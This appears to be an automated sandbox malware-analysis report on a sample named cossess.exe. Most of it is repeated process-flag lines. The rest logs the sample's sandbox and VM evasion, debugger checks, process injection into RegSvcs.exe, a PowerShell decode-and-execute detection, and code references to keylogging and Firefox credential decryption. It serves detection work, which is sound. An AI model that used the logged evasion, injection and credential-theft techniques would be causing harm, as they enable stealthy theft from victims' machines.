Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cossess.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cossess.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Roaming\cossess.exe

API/Special instruction interceptor: Address: 15A15B4

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: cossess.exe, 00000006.00000002.965624910.0000000001672000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: FIDDLER.EXE{R

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Window / User API: threadDelayed 7622	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7321	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2297	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.dll

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\cossess.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_6-102490

Source: C:\Users\user\AppData\Roaming\cossess.exe

API coverage: 4.7 %

Source: C:\Windows\SysWOW64\mshta.exe TID: 6744	Thread sleep count: 7622 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7136	Thread sleep count: 7321 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7136	Thread sleep count: 2297 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6248	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7128	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0057445A GetFileAttributesW,FindFirstFileW,FindClose,	6_2_0057445A
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0057C6D1 FindFirstFileW,FindClose,	6_2_0057C6D1
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0057C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	6_2_0057C75C
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0057EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_0057EF95
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0057F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_0057F0F2
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0057F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_0057F3F3
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_005737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_005737EF
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00573B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_00573B12
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0057BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_0057BCBC

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_005149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

6_2_005149A0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: powershell.exe, 00000003.00000002.981931540.00000000050C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.981931540.00000000050C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: svchost.exe, 00000009.00000002.2103810332.0000023D31E2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: powershell.exe, 00000003.00000002.991614121.000000000843F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.991919412.00000000084A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2105605178.0000023D37641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2105668884.0000023D37653000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: cossess.exe, 00000006.00000002.965624910.0000000001672000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareworkstation.exe g.'
Source: powershell.exe, 00000003.00000002.991614121.000000000843F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: powershell.exe, 00000003.00000002.991614121.000000000843F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx!I
Source: powershell.exe, 00000003.00000002.981931540.00000000050C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: RegSvcs.exe, 00000007.00000002.2102294360.0000000000767000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Roaming\cossess.exe

API call chain: ExitProcess graph end node

graph_6-101102

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_0234C168 LdrInitializeThunk,LdrInitializeThunk,

7_2_0234C168

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_00583F09 BlockInput,

6_2_00583F09

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_00513B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

6_2_00513B3A

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_00545A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

6_2_00545A7C

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_00514B37 LoadLibraryA,GetProcAddress,

6_2_00514B37

Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_015A01B0 mov eax, dword ptr fs:[00000030h]	6_2_015A01B0
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_015A1820 mov eax, dword ptr fs:[00000030h]	6_2_015A1820
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_015A1880 mov eax, dword ptr fs:[00000030h]	6_2_015A1880

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_005680A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

6_2_005680A9

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0053A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		6_2_0053A155
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0053A124 SetUnhandledExceptionFilter,		6_2_0053A124

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell decode and execute

Source: Yara match

File source: amsi32_7092.amsi.csv, type: OTHER

.NET source code references suspicious native API functions

Source: 6.2.cossess.exe.1540000.1.raw.unpack, UltraSpeed.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 6.2.cossess.exe.1540000.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 6.2.cossess.exe.1540000.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\cossess.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\cossess.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 365008

Jump to behavior

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_005687B1 LogonUserW,

6_2_005687B1

Source: C:\Users\user\AppData\Roaming\cossess.exe

